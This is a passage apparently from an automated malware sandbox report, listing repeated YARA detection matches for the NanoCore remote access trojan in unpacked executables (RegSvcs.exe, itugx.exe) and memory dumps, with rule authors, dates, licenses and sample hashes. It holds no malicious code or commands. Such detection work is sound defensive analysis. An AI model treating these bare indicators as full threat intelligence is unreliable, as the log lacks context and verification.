      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
